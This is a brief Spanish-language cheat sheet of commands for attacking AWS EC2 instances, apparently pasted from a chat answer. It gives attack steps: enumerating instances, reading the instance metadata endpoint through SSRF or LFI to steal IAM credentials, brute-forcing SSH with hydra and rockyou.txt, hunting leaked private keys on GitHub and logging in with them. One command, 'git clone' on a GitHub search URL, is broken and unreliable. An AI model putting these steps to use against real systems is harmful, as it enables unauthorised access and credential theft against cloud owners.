Enumeración:
aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId, PublicIpAddress, State.Name]' --output table
Obtener metadatos internos (si hay SSRF o LFI):
curl http://169.254.169.254/latest/meta-data/
Si esta URL es accesible desde una aplicación vulnerable, un atacante podría robar credenciales temporales de IAM.
Bruteforce SSH
hydra -l ec2-user -P rockyou.txt ssh://<IP-EC2>
Buscar claves privadas expuestas en GitHub:
bash
CopiarEditar
git clone <https://github.com/search?q=aws+ec2+key&type=code>
Si encuentras archivos .pem o .ppk, intenta conectarte con:
bash
CopiarEditar
ssh -i clave.pem ec2-user@<IP-EC2>
📌 Si obtienes acceso SSH, verifica permisos IAM desde la instancia:
bash
CopiarEditar
aws sts get-caller-identity
Si responde, significa que la máquina tiene permisos de IAM activos.